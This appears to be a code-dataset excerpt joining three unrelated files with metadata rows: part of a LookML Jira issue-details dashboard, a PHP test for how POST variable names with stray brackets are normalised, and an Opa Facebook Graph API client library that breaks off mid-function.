x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
series_types: {}
listen:
Issue ID: issue_extended.id
row: 0
col: 7
width: 8
height: 2
- title: Issue Description
name: Issue Description
model: jira_block
explore: issue_extended
type: looker_single_record
fields:
- issue_extended.description
sorts:
- issue_extended.description
limit: 500
column_limit: 50
show_view_names: false
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
stacking: ''
show_value_labels: false
label_density: 25
legend_position: center
x_axis_gridlines: false
y_axis_gridlines: true
limit_displayed_rows: false
y_axis_combined: true
show_y_axis_labels: true
show_y_axis_ticks: true
y_axis_tick_density: default
y_axis_tick_density_custom: 5
show_x_axis_label: true
show_x_axis_ticks: true
x_axis_scale: auto
y_axis_scale_mode: linear
ordering: none
show_null_labels: false
show_totals_labels: false
show_silhouette: false
totals_color: "#808080"
series_types: {}
listen:
Issue ID: issue_extended.id
title_hidden: true
row: 0
col: 15
width: 9
height: 2
- title: Issue Status
name: Issue Status
model: jira_block
explore: issue_extended
type: single_value
fields:
- issue_extended.status_name
sorts:
- issue_extended.status_name
limit: 500
query_timezone: America/New_York
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
show_view_names: true
show_row_numbers: true
truncate_column_names: false
hide_totals: false
hide_row_totals: false
table_theme: editable
limit_displayed_rows: false
enable_conditional_formatting: false
conditional_formatting_include_totals: false
conditional_formatting_include_nulls: false
series_types: {}
listen:
Issue ID: issue_extended.id
row: 0
col: 3
width: 4
height: 2
- title: Issue Sprint History
name: Issue Sprint History
model: jira_block
explore: sprint
type: table
fields:
- issue.id
- sprint.name
- sprint.board_id
- sprint.start_date
- sprint.complete_date
- sprint.end_date
sorts:
- sprint.start_date
limit: 500
query_timezone: America/New_York
show_view_names: false
show_row_numbers: true
truncate_column_names: false
hide_totals: false
hide_row_totals: false
table_theme: editable
limit_displayed_rows: false
enable_conditional_formatting: false
conditional_formatting_include_totals: false
conditional_formatting_include_nulls: false
conditional_formatting:
- type: low to high
value:
background_color:
font_color:
palette:
name: Red to Yellow to Green
colors:
- "#F36254"
- "#FCF758"
- "#4FBC89"
__FILE: jira_block/issue_details.dashboard.lookml
__LINE_NUM: 285
bold: false
italic: false
strikethrough: false
fields:
__FILE: jira_block/issue_details.dashboard.lookml
__LINE_NUM: 280
listen:
Issue ID: issue.id
row: 2
col: 10
width: 14
height: 3
- title: Issue ID
name: Issue ID
model: jira_block
explore: issue_extended
type: single_value
fields:
- issue_extended.id
limit: 500
query_timezone: America/New_York
custom_color_enabled: false
custom_color: forestgreen
show_single_value_title: true
show_comparison: false
comparison_type: value
comparison_reverse_colors: false
show_comparison_label: true
show_view_names: true
show_row_numbers: true
truncate_column_names: false
hide_totals: false
hide_row_totals: false
table_theme: editable
limit_displayed_rows: false
enable_conditional_formatting: false
conditional_formatting_include_totals: false
conditional_formatting_include_nulls: false
series_types: {}
listen:
Issue ID: issue_extended.id
row: 2
col: 0
width: 3
height: 2
- title: issue
name: issue
model: jira_block
explore: issue_history_2
type: looker_single_record
fields:
- issue.id
- issue.assignee
- issue.created_date
- issue.project
- issue.due_date
- issue.environment
- issue.external_issue_id
- issue._original_estimate
- issue.original_estimate
limit: 500
column_limit: 50
show_view_names: false
show_row_numbers: true
truncate_column_names: false
hide_totals: false
hide_row_totals: false
table_theme: editable
limit_displayed_rows: false
enable_conditional_formatting: false
conditional_formatting_ignored_fields: []
conditional_formatting_include_totals: false
conditional_formatting_include_nulls: false
series_types: {}
listen:
Issue ID: issue.id
row: 4
col: 0
width: 10
height: 33
- title: Issue Change History
name: Issue Change History
model: jira_block
explore: issue_history_2
type: table
fields:
- issue_history_all.issue_id
- issue_history_all.time_date
- issue_history_all.value
- issue_history_all.changed
sorts:
- issue_history_all.time_date desc
limit: 500
column_limit: 50
show_view_names: false
show_row_numbers: true
truncate_column_names: false
hide_totals: false
hide_row_totals: false
table_theme: editable
limit_displayed_rows: false
enable_conditional_formatting: false
conditional_formatting_ignored_fields: []
conditional_formatting_include_totals: false
conditional_formatting_include_nulls: false
listen:
Issue ID: issue.id
row: 8
col: 10
width: 14
height: 9
- title: Issue Version History
name: Issue Version History
model: jira_block
explore: version
type: table
fields:
- version.name
- version.start_date
- version.release_date
- issue_extended.id
sorts:
- version.start_date desc
limit: 500
query_timezone: America/New_York
hidden_fields:
- issue.id
listen:
Issue ID: issue_extended.id
row: 5
col: 10
width: 14
height: 3
filters:
- name: Issue ID
title: Issue ID
type: field_filter
default_value: ''
model: jira_block
explore: issue_history_2
field: issue.id
listens_to_filters: []
allow_multiple_values: true
required: false
| LookML | 3 | llooker/jira_block_fivetran | issue_details.dashboard.lookml | [
"MIT"
] |
--TEST--
Bug #78236 (convert error on receiving variables when duplicate [)
--POST--
id[name=1&id[[name=a&id[na me.=3
--FILE--
<?php
var_dump($_POST);
?>
--EXPECT--
array(3) {
["id_name"]=>
string(1) "1"
["id__name"]=>
string(1) "a"
["id_na_me_"]=>
string(1) "3"
}
| PHP | 3 | NathanFreeman/php-src | tests/basic/bug78236.phpt | [
"PHP-3.01"
] |
/*
Copyright © 2011 MLstate
This file is part of Opa.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* Author : Nicolas Glondu <[email protected]>
**/
/**
* Facebook Graph API modules
*
* @category api
* @author Nicolas Glondu, 2011
* @destination public
*/
import stdlib.apis.common
import stdlib.apis.facebook
import stdlib.apis.facebook.lib
/**
* {1 About this module}
*
* This module provides an access to Facebbok Graph API.
* Important :
* Any application using this must respect
* {{:http://developers.facebook.com/policy}Facebook policy}
* Some of the documentation is extracted from
* {{:https://developers.facebook.com}Facebook API reference}
*
* {1 Where should I start?}
*
* You should first {{:https://www.facebook.com/developers/}register an app}
* to get a application id, an api key and an application secret. You will
* also have to configure various parameters on your application. Once done,
* look the module [FbAuth] to obtain an access token from users. You are now
* ready to use Facebook's Graph API.
*/
/**
* Options of an object read request [FbGraph.Read.object]
* or of a multiple objects request [FbGraph.multiple_objects]
* - [token] Token of a logged user (required to access some private attributes)
* - [fields] List of the fields you want. If empty, default fields will be
* returned (depending on the type of viewed object and of application
* authorizations).
*/
type FbGraph.Read.object_options = {
token : string
fields : list(string)
metadata : bool
}
/**
* Type of a parsed metadata
* Note: You should avoid asking metadata uselessly because an answer with
* metada is between 5 and 10 times bigger than the same request without
* metadata.
* - [obj_type] Type of associated object. There is no other safe way to be
* sure of the type of an object.
* - [connections] Connections of associated object and links to those.
* - [fields] Name and descriptions of fields available in object. The field
* "id" is always returned.
*/
type FbGraph.Read.metadata = {
obj_type : string
connections : list((string,string))
fields : list((string,string))
}
/**
* Type of a facebook object
* - [id] Only field present in all elements
* - [data] List of (name, value) corresponding to each field of an object.
* Values are in JSON.
*/
type FbGraph.data = {
id : string
data : list((string,RPC.Json.json))
}
/**
* Result of an object request
*/
type FbGraph.Read.object =
{ object : FbGraph.data } /** Request successful without metadata. Answer is a list of (string,json) elements corresponding to all fields */
/ { object_metadata : (FbGraph.data,FbGraph.Read.metadata) } /** Tuple containing asked object and metadata. */
/ { error : Facebook.error } /** Request failed */
/**
* Result of an raw request, just the response content.
*/
type FbGraph.Read.raw =
{ content : string location : string content_type : string}
/ { error : Facebook.error }
/**
* Result of a multiple object request
*/
type FbGraph.Read.objects =
{ objects : list((string,FbGraph.data)) } /** Request successful without metadata. Answer is a list of (string, object) corresponding to requested ids. */
/ { objects_metadata : list((string,FbGraph.data,FbGraph.Read.metadata)) } /** Request successful with metadata. Answer is a list of (string, object, metadata) corresponding to requested id. */
/ { error : Facebook.error } /** Request failed */
/**
* Size of a picture
*/
type FbGraph.Read.pic_size =
{ square } /** 50x50 px */
/ { small } /** 50 pixels wide, variable height */
/ { normal } /** 100 pixels wide, variable height */
/ { large } /** 200 pixels wide, variable height */
/**
* Paging options
* - [limit] Number of elements shown
* - [offset] Number of elements skipped
* - [until] Date of newest element returned
* - [since] Date of oldest element returned
*/
// TODO: Cursor-based pagination
type FbGraph.paging_options = {
limit : int
offset : int
until : option(Date.date)
since : option(Date.date)
}
/**
* Paging element returned by Facebook
* - [next] Paging options of next page
* - [previous] Paging options of previous page
*/
type FbGraph.paging = {
next : FbGraph.paging_options
previous : FbGraph.paging_options
}
/**
* Type of most elements returned by Facebook in case of success
* - [data] List of elements corresponding to what was requested
* - [paging] Paging parameters of request
*/
type FbGraph.data_paging = {
data : list(FbGraph.data)
paging : FbGraph.paging
}
type FbGraph.data_paging_res =
{ success : FbGraph.data_paging }
/ { error : Facebook.error }
/**
* Type of a place searched using Facebook's search API
*/
type FbGraph.Search.query_place = {
longitude : float /** Longitude of the center of the seach */
latitude : float /** Latitude of the center of the seach */
distance : int /** Distance of the search from the center */
}
/**
* Type of objects that can be requested using Facebook's search API
*/
type FbGraph.Search.query_type =
{ post } /** Search among all visible posts */
/ { user } /** Search among users. Requires a valid access_token */
/ { page } /** Search among pages */
/ { event } /** Search among events */
/ { group } /** Search among groups */
/ { place : FbGraph.Search.query_place } /** Search among places. Requires a valid access_token */
/**
* Location of an event
* See [FbGraph.event] for more information about events
*/
type FbGraph.event_place = {
street : string
city : string
state : string
zip : string
country : string
latitude : float
longitude : float
}
/**
* Privacy of an event
* See [FbGraph.event] for more information about events
*/
type FbGraph.event_privacy =
{ OPEN } / { CLOSED } / { SECRET }
/**
* Type of a Facebook event
*/
type FbGraph.event = {
name : string
description : string
start_time : Date.date
end_time : Date.date
location : string
place : FbGraph.event_place
privacy : FbGraph.event_privacy
}
/**
* Type of a Facebook album
*/
type FbGraph.album = {
name : string
message : string
location : string
link : string
}
/**
* Type of a Facebook photo
*/
type FbGraph.photo = {
filename : string
content_type : string
source : string
message : string
}
/**
* Type of a Facebook video
*/
type FbGraph.video = {
filename : string
content_type : string
source : string
title : string
description : string
}
/**
* Type of a Facebook picture
*/
type FbGraph.picture = {
filename : string
content_type : string
source : string
}
/**
* Type of a Facebook link
* Default value is [FbGraph.Post.default_link]
* - [to] ID or username of the profile that this story will be published
* to. If this is unspecified, it defaults to "me".
* - [message] Message of the link.
* - [link] Link shared
* - [picture] URL of a picture attached to this link.used.
* - [name] Name of the link attachment.
* - [caption] Caption of the link (appears beneath the link name).
* - [description] Description of the link (appears beneath the link caption).
*/
type FbGraph.link = {
to : string
message : string
link : string
picture : string
name : string
caption : string
description : string
}
/**
* Type of results of posting actions
*/
type FbGraph.Post.result =
{ success : string } /** Id of created element if it has one. "Like", for instance, has no id so the success string will be empty. */
/ { error : Facebook.error } /** Action failed */
type FbGraph.Insight.period = {day} / {week} / {month} / {lifetime}
/**
* An insight value content
*/
type FbGraph.Insight.value_t =
{ val_int : int } /** Simple integer value */
/ { val_obj : list((string,RPC.Json.json)) } /** More complex json value - Generally an array with various subvalues */
/**
* An insight value
* - [value] The value
* - [end_time] End time of value measure
*/
type FbGraph.Insight.value = {
value : FbGraph.Insight.value_t
end_time : string /* TODO -> Date.date */
}
/**
* An insight (or statistic) element
* - [id] Unique ID of insight
* - [name] Name of insight
* - [description] Short description of the insight
* - [period] Duration of statistics measures
* - [values] Statistic values
*/
type FbGraph.Insight.t = {
id : string
name : string
description : string
period : FbGraph.Insight.period
values : list(FbGraph.Insight.value)
}
type FbGraph.Insight.insights = {
insights : list(FbGraph.Insight.t)
paging : FbGraph.paging
}
type FbGraph.Insight.insights_res =
{ insights : FbGraph.Insight.insights }
/ { error : Facebook.error }
type FbGraph.property_value0('a) =
{ string : string }
/ { int : int }
/ { bool : bool }
/ { object : list((string,'a)) }
/ { array : list('a) }
type FbGraph.property_value = FbGraph.property_value0(FbGraph.property_value)
type FbGraph.property = (string,FbGraph.property_value)
type FbGraph.properties = list(FbGraph.property)
type FbGraph.object_type = {user} / {permissions} / {page}
type FbGraph.order_status = {placed} / {settled} / {refunded} / {disputed} / {cancelled}
type FbGraph.offer = {
title:string /** The title of the Offer */
expiration_time:string /** The expiration time of the Offer (used when displaying the Offer) date/time format ISO-8601 */
terms:option(string) /** The terms of the Offer */
image_url:option(string) /** The URL for the Offer's image. Either image_url or image parameter should be specified. */
image:option(string) /** The image for the Offer. Either image_url or image parameter should be specified. binary file */
claim_limit:option(int) /** The maximum number of times the offer can be claimed */
coupon_type:option(string) /** The type of offer: in_store_only, in_store_and_online or online_only */
qrcode:option(string) /** QR code - alphanumeric with limited punctuation: $ % * + - . / : */
barcode:option(string) /** 12-character UPC-A or 13-character EAN-13 barcode (alphanumeric) */
redemption_link:option(string) /** The URL where the offer may be redeemed */
redemption_code:option(string) /** A code to enter on your website to receive the discount or promotion (50 characters max) */
}
type FbGraph.setting = {users_can_post} / {users_can_post_photos} / {users_can_tag_photos} / {users_can_post_videos}
type FbGraph.privacy_type = {open} / {secret} / {friends}
type FbGraph.method = {get} / {put} / {post} / {delete}
type FbGraph.header = {name:string value:string}
type FbGraph.batch_type = {object} / {post} / {delete}
type FbGraph.batch_request = {
typ : FbGraph.batch_type
metadata : bool
method : FbGraph.method
name : option(string)
relative_url : string
headers : list(FbGraph.header)
body : option(string)
}
type FbGraph.batch_requests = list(FbGraph.batch_request)
type FbGraph.batch_result =
{typ : FbGraph.batch_type
metadata : bool
code : int
headers : list(FbGraph.header)
body : option(string)}
/ {error : Facebook.error}
type FbGraph.batch_results =
{batch_results : list(FbGraph.batch_result)}
/ {error : Facebook.error}
type FbGraph.Post.token_or_batch =
{token : string}
/ {batch : string}
type FbGraph.result =
{object : FbGraph.Read.object}
/ {post : FbGraph.Post.result}
/ {delete : FbGraph.Post.result}
/ {batch_request : FbGraph.batch_request}
/ {error : Facebook.error}
type FbGraph.processed_batch_results =
{processed_batch_results : list(FbGraph.result)}
/ {error : Facebook.error}
FbGraph = {{
/* Static */
@private graph_url = "https://graph.facebook.com"
@private video_url = "https://graph-video.facebook.com"
/* Generic private functions */
@private build_data(all_data:list((string,RPC.Json.json))) =
id = FbLib.fetch_json_string("id", all_data)
data = List.filter(((a,_)->a!="id"),all_data)
{ ~id ~data }
/* Paging */
/**
* Default paging element - Will returns default display
*/
default_paging = {
limit = 0
offset = 0
until = none
since = none
} : FbGraph.paging_options
no_paging = {
next = default_paging
previous = default_paging
} : FbGraph.paging
@private parse_paging_field(name, data) : FbGraph.paging_options =
match List.assoc(name, data) with
| {some={String=s}} ->
second(l) = List.get(1, l) ? ""
params = String.explode("?", s) |> second |> API_libs.get_data
get_int(name) = match List.assoc(name,params) with
| {some=s} -> Int.of_string(s)
| {none} -> 0
get_date(name) = match List.assoc(name,params) with
| {some=s} -> {some=Date.milliseconds(Int.of_string(s) * 1000)}
| {none} -> none
{
limit = get_int("limit")
offset = get_int("offset")
until = get_date("until")
since = get_date("since")
}
| _ -> default_paging
@private parse_paging(data) : FbGraph.paging =
match List.assoc("paging", data) with
| {some={Record=p}} ->
next = parse_paging_field("next", p)
previous = parse_paging_field("previous", p)
{ ~next ~previous }
| _ -> no_paging
@private prepare_paging(options) =
sub_int(n) = if n>0 then "{n}" else ""
FbLib.params([{nes=("limit", sub_int(options.limit))},
{nes=("offset",sub_int(options.offset))},
{nes=("until", (Option.map(Date.to_string,options.until))?"")},
{nes=("since", (Option.map(Date.to_string,options.since))?"")}])
@private check_for_error(data, on_ok, on_error) =
match List.assoc("error", data) with
| {some={Record=r}} ->
Facebook.make_error(FbLib.fetch_json_string("type", r),
FbLib.fetch_json_string("message", r))
|> on_error
| _ -> on_ok(data)
@private build_data_paging(r) : FbGraph.data_paging_res =
match Json.of_string(r) with
| {none} -> { error = Facebook.parse_error(r) }
| {some={Record=r}} ->
on_ok(x) =
aux(v,acc) = match v with
| {Record=o} -> List.add(build_data(o), acc)
| _ -> acc
data = match List.assoc("data", x) with
| {some={List=l}} -> List.fold(aux,l,[])
| _ -> []
paging = parse_paging(x)
{ success = { ~data ~paging } }
check_for_error(r, on_ok, (x -> { error = x }))
| _ -> { error = Facebook.data_error }
@private generic_return(res) : FbGraph.Post.result =
match res with
| {none} -> { error = Facebook.network_error }
| {some=r} -> process_post(r)
@private process_post(r) : FbGraph.Post.result =
match Json.of_string(r) with
| {none} -> { error = Facebook.parse_error(r) }
| {some={Record=r}} ->
on_ok(x:list((string,RPC.Json.json))) =
id = FbLib.fetch_json_string("id", x)
{ success = id }
check_for_error(r, on_ok, (y -> { error = y }))
| {some={Bool=r}} ->
if r then { success = "" }
else { error = Facebook.data_error }
| {some={Int=number}} -> {success="{number}"}
| _ -> { error = Facebook.data_error }
end
@private @publish generic_action(path, data, token:FbGraph.Post.token_or_batch) : FbGraph.result =
match token with
| {~token} ->
data = List.add(("access_token", token), data)
{post=generic_return(FbLib.fb_post(graph_url, path, data))}
| {~batch} ->
name = if batch == "" then none else {some=batch}
body = {some=API_libs.form_urlencode(data)}
path = if String.has_prefix("/",path) then String.sub(1,String.length(path)-1,path) else path
{batch_request={typ={post}; ~name; metadata=false; method={post}; relative_url=path; headers=[]; ~body}}
@private @publish generic_action_multi(path, forms, token) : FbGraph.Post.result =
forms = List.add({name="access_token"; content=token}, forms)
generic_return(FbLib.fb_post_multi(graph_url, path, forms))
@private @publish generic_action_multi_base(base, path, forms, token) : FbGraph.Post.result =
forms = List.add({name="access_token"; content=token}, forms)
generic_return(FbLib.fb_post_multi(base, path, forms))
@private @publish generic_delete(path, data, token) : FbGraph.result =
match token with
| {~token} ->
data = List.add(("access_token", token), data)
{delete=generic_return(FbLib.fb_delete(graph_url, path, data))}
| {~batch} ->
name = if batch == "" then none else {some=batch}
body = {some=API_libs.form_urlencode(data)}
path = if String.has_prefix("/",path) then String.sub(1,String.length(path)-1,path) else path
{batch_request={typ={delete}; ~name; metadata=false; method={post}; relative_url=path; headers=[]; ~body}}
@private string_of_object_type(ot:FbGraph.object_type) =
match ot with
| {user} -> "user"
| {permissions} -> "permissions"
| {page} -> "page"
@private multiuser(id, users, pathname, fieldname) =
match users with
| [user_id] -> ("/{id}/{pathname}/{user_id}",[])
| _ -> ("/{id}/{pathname}",[(fieldname,String.concat(",",users))])
/* Submodules */
Delete = {{
/**
* Deletes object [id]
*/
object(id, token) =
generic_delete("/{id}", [], token)
/**
* Delete achievement(instance) object [id]
*/
achievement(id, token) =
generic_delete("/{id}/achievements", [], token)
/**
* Unlike object [id] (works with various types of id)
*/
unlike(id, token) =
generic_delete("/{id}/likes", [], token)
/**
* Unban a user from an application. The token must be an application access token.
*/
unban(user_id, token) =
generic_delete("/{user_id}", [], token)
/** Remove currency association from app. */
payment_currency(app_id, currency_url, token) =
generic_delete("/{app_id}", [("currency_url",currency_url)], token)
/** Remove user role from app. */
role(app_id, user, token) =
generic_delete("/{app_id}/roles", [("user",user)], token)
/** Delete subscriptions. */
subscriptions(app_id, object:option(FbGraph.object_type), token) =
data = FbLib.params([{copt=("object", string_of_object_type, object)}])
generic_delete("/{app_id}/subscriptions", data, token)
/** Delete translations.
* The native_hashes actually come from the "Translations" app.
*/
translations(app_id, native_hashes:list((string,string)), token) =
data = [("native_hashes",List.to_string_using("[","]",",",List.map(((s,d) -> "\{\"{s}\":\"{d}\"}"),native_hashes)))]
generic_delete("/{app_id}/translations", data, token)
/** Delete all scores. */
scores(app_id, token) = generic_delete("/{app_id}/scores", [], token)
/** Delete a comment. */
comment(comment_id, token) = generic_delete("/{comment_id}", [], token)
/** Uninvite a user. */
invited(event_id, user_id, token) = generic_delete("/{event_id}/invited/{user_id}", [], token)
/** Delete picture. */
picture(id, token) = generic_delete("/{id}/picture", [], token)
/** Delete friendlist. */
friendlist = object
/** Delete members. */
members(id, users, token) =
(path, data) = multiuser(id, users, "members", "members")
generic_delete(path, data, token)
/** Delete event */
event = object
/** Delete question */
question = object
/** Delete milestone */
milestone = object
/** Delete picture. */
tab(page_id, tab_id, token) = generic_delete("/{page_id}/tabs/{tab_id}", [], token)
/** Unblock user. */
unblock(page_id, user_id, token) = generic_delete("/{page_id}/blocked", [("uid",user_id)], token)
/** Delete photo. */
photo(profile_id, token) = generic_delete("/{profile_id}/photos", [], token)
/** De-authorize application. */
deauthorize(profile_id, token) = generic_delete("/{profile_id}/permissions", [], token)
/** Revoke permission. */
revoke(profile_id, permission_name, token) = generic_delete("/{profile_id}/permissions/{permission_name}", [], token)
/** Delete score. */
score(user_id, token) = generic_delete("/{user_id}/scores", [], token)
}}
Insights = {{
@private period_from_string(s) : FbGraph.Insight.period =
match s with
| "lifetime" -> {lifetime}
| "month" -> {month}
| "week" -> {week}
| "day" | _ -> {day}
@private period_to_string(s) =
match s:FbGraph.Insight.period with
| {lifetime} -> "lifetime"
| {month} -> "month"
| {week} -> "week"
| {day} -> "day"
@private value_from_json(json:RPC.Json.json) : option(FbGraph.Insight.value) =
match json with
| {Record=l} ->
end_time = FbLib.fetch_json_string("end_time", l)
value = match List.assoc("value", l) with
| {some={Record=l}} -> {val_obj=l}
| {some={Int=i}} -> {val_int=i}
| _ -> {val_obj=[]}
end
{some = { ~value ~end_time }}
| _ -> none
@private build_insight(o:FbGraph.data) : FbGraph.Insight.t =
aux(v,acc) = match value_from_json(v) with
| {some=value} -> List.add(value, acc)
| {none} -> acc
values = match List.assoc("values", o.data) with
| {some={List=l}} -> List.fold(aux,l,[])
| _ -> []
get(name) = FbLib.fetch_json_string(name, o.data)
{ id = o.id
name = get("name")
description = get("description")
period = period_from_string(get("period"))
values = values }
@private build_insights(o) : FbGraph.Insight.insights_res =
match build_data_paging(o) : FbGraph.data_paging_res with
| {error=e} -> { error = e }
| {success=s} ->
insights = List.rev(List.map(build_insight, s.data))
{ insights = {insights=insights
paging=s.paging} }
@private generic_insights(path, token, paging) : FbGraph.Insight.insights_res =
data = prepare_paging(paging)
|> FbLib.add_if_filled("access_token", token, _)
match FbLib.fb_get(graph_url, path, data) with
| {none} -> { error = Facebook.network_error }
| {some=r} -> build_insights(r)
/**
* Get all statistics available about [elt_id] element
* Unlike most other API calls, the token used can be an application token,
* you can obtain one using [FbAuth.app_login]. You can also use a user token
* with the permission [manage_pages] and manage this user's elements.
*/
full(elt_id, token, paging) : FbGraph.Insight.insights_res =
generic_insights("/{elt_id}/insights", token, paging)
/**
* Get statistics on given metrics for your application
* A list of available metrics is available in
* {{:https://developers.facebook.com/docs/reference/fql/insights/}metrics documentation}
* Unlike most other API calls, the token used can be an application token,
* you can obtain one using [FbAuth.app_login]. You can also use a user token
* with the permission [manage_pages] and manage this user's elements.
*/
metric(metric, elt_id, token, paging) : FbGraph.Insight.insights_res =
generic_insights("/{elt_id}/insights/{metric}", token, paging)
/**
* Get statistics on given metrics and in a given priod for your application
* A list of available metrics is available at :
* {{:https://developers.facebook.com/docs/reference/fql/insights/}metrics documentation}
* Note that not all metrics support all periods. You should refer to the
* documentation for more information.
* Unlike most other API calls, the token used can be an application token,
* you can obtain one using [FbAuth.app_login]. You can also use a user token
* with the permission [manage_pages] and manage this user's elements.
*/
metric_period(metric, period, elt_id, token, paging) : FbGraph.Insight.insights_res =
generic_insights("/{elt_id}/insights/{metric}/{period_to_string(period)}", token, paging)
}}
Post = {{
@private string_of_property_value(pv:FbGraph.property_value) =
match pv with
| {~string} -> "\"{string}\""
| {~int} -> "{int}"
| {~bool} -> "{bool}"
| {~object} -> List.to_string_using("\{","}",",",List.map(((n,v) -> "\"{n}\":{string_of_property_value(v)}"),object))
| {~array} -> List.to_string_using("[","]",",",List.map(string_of_property_value,array))
@private options_of_properties(properties:FbGraph.properties) =
List.map(((n,pv) -> (n,string_of_property_value(pv))),properties)
generic_properties(id, properties, token) =
generic_action("/{id}", options_of_properties(properties), token)
/**
* Create achievement(instance) for [user_id]
*/
achievement(user_id, achievement:string, message:option(string), token) =
data = FbLib.params([{sreq=("achievement", achievement)},{sopt=("message",message)}])
generic_action("/{user_id}/achievements", data, token)
/**
* Create migration for [app_id], [name]:[value]
*/
migration(app_id, name, value:int, token) =
properties = [("migrations",{object=[(name,{int=(if value == 0 then 0 else 1)})]})]
generic_properties(app_id, properties, token)
/**
* Create restriction for [app_id], [name]:"[value]"
*/
restriction(app_id, name, value:string, token) =
properties = [("restrictions",{object=[(name,{string=value})]})]
generic_properties(app_id, properties, token)
/**
* Modify properties for [app_id]
*/
properties(app_id, properties, token) =
generic_properties(app_id, properties, token)
/**
* Create a test user for [app_id].
* NOTE: uses the application access token *NOT* the application Page access token.
*/
test_user(app_id, installed:option(bool), permissions:list(Facebook.permission), name:option(string), token) =
data = FbLib.params([{bopt=("installed",installed)},
{lopt=("permissions",Facebook.permission_to_string,permissions)},
{sopt=("name",name)}])
generic_action("/{app_id}/accounts/test-users", data, token)
ban(app_id, users, token) =
data = [("uid",String.concat(",",users))]
generic_action("/{app_id}/banned", data, token)
simple_link(app_id, link, message, token) =
data = FbLib.params([{sreq=("link",link)},{sopt=("message",message)}])
generic_action("/{app_id}/feed", data, token)
payment_currency(app_id, currency_url, token) =
data = [("currency_url", currency_url)]
generic_action("/{app_id}/payment_currencies", data, token)
/**
* Create a post on an application's profile page.
* Token needs [publish_stream] permissions.
* Works on various ids but this is a generic post, not all
* fields are accepted by all targets.
*/
post(id, p:Facebook.post, token) =
data = FbLib.params([{sopt=("message",p.message)},
{sopt=("link",p.link)},
{sopt=("picture",p.picture)},
{sopt=("name",p.name)},
{sopt=("caption",p.caption)},
{sopt=("description",p.description)},
{aopt=("actions",FbLib.feed_link_to_json,p.actions)},
{sopt=("place",p.place)},
{lopt=("tags",(s->s),p.tags)},
{sopt=("privacy",p.privacy)},
{sopt=("object_attachment",p.object_attachment)}])
generic_action("/{id}/feed", data, token)
/** Add user role for app. */
role(app_id, user, role, token) =
data = [("user",user),("role", role)]
generic_action("/{app_id}/roles", data, token)
/** Post a status message on an object. Various objects supported. */
status(id, message, token) =
data = [("message",message)]
generic_action("/{id}/feed", data, token)
/**
* Set up a subscription.
* Needs application page access token.
*/
subscriptions(app_id, ot:FbGraph.object_type, fields:Facebook.properties,
callback_url:string, verify_token:option(string), token) =
data = FbLib.params([{creq=("object",string_of_object_type,ot)},
{jreq=("fields",FbLib.fb_properties_to_json,fields)},
{sreq=("callback_url",callback_url)},
{sopt=("verify_token", verify_token)}])
generic_action("/{app_id}/subscriptions", data, token)
/**
* Upload application strings for translation.
* Needs application page access token.
*/
native_strings_to_json(native_strings:list({text:string; description:string})) : RPC.Json.json =
aux(ns) : RPC.Json.json =
{Record=[("text", {String=ns.text}:RPC.Json.json),
("description", {String=ns.description}:RPC.Json.json)]}
{List=List.map(aux, native_strings)}
translations(app_id, native_strings:list({text:string; description:string}), token) =
data = FbLib.params([{jreq=("native_strings",native_strings_to_json,native_strings)}])
generic_action("/{app_id}/translations", data, token)
/**
* Requires multipart/form-data forms.
* NOTE: should also work with USER_ID and EVENT_ID (and maybe others).
* NOTE: this currently doesn't work because of facebook internal errors...
*/
photos(album_id, photo, token) =
forms = FbGraph_to_string.photo_to_form(photo)
generic_action_multi("/{album_id}/photos", forms, token)
/**
* Publish a video to an Application.
* Also works with event_id.
* Requires multipart/form-data forms.
* NOTE: this currently doesn't work because of facebook internal errors...
*/
videos(page_id, v:FbGraph.video, token) =
forms = FbLib.forms([{file=("source",v.filename,v.content_type,v.source)},
{nes=("title", v.title)},
{nes=("description", v.description)}])
generic_action_multi_base(video_url, "/{page_id}/videos", forms, token)
/**
* Requires multipart/form-data forms.
* NOTE: this currently doesn't work because of facebook internal errors...
*/
picture(id, p:FbGraph.picture, token) =
forms = [{name="source"; filename=p.filename; content_type=p.content_type; content=p.source}]
generic_action_multi("/{id}/picture", forms, token)
users_generic(id, users:list(string), pathname, fieldname, token) =
if users == []
then {error=Facebook.make_error("FbGraph.Post.{pathname}","No users")}
else
(path,data) = multiuser(id, users, pathname, fieldname)
generic_action(path, data, token)
/**
* Invite users to an event.
* Needs [create_event] permission.
*/
invited(event_id, invited:list(string), token) = users_generic(event_id, invited, "invited", "users", token)
/**
* Create a FriendList for a user.
* Maximum name length is 25 chars.
* Needs manage_friendlists permission.
*/
friendlist(profile_id, name, token) =
if String.length(name) > 25
then {error=Facebook.make_error("friendlist","Name longer than 25 characters")}
else
data = [("name",name)]
generic_action("/{profile_id}/friendlists", data, token)
/**
* Invite users to an event.
* Needs [create_event] permission.
*/
members(friendlist_id, members:list(string), token) = users_generic(friendlist_id, members, "members", "members", token)
string_of_order_status(os:FbGraph.order_status) =
match os with
| {placed} -> "placed"
| {settled} -> "settled"
| {refunded} -> "refunded"
| {disputed} -> "disputed"
| {cancelled} -> "cancelled"
/**
* Update an order.
* Docs don't say which kind of token/permission is needed.
* The params value is: "optional JSON-encoded dictionary {'comment' => }", however that is encoded.
*/
order(id, status:FbGraph.order_status, message:string, params:option(string), token) =
data = FbLib.params([{creq=("status",string_of_order_status,status)},
{sreq=("message",message)},
{sopt=("params", params)}])
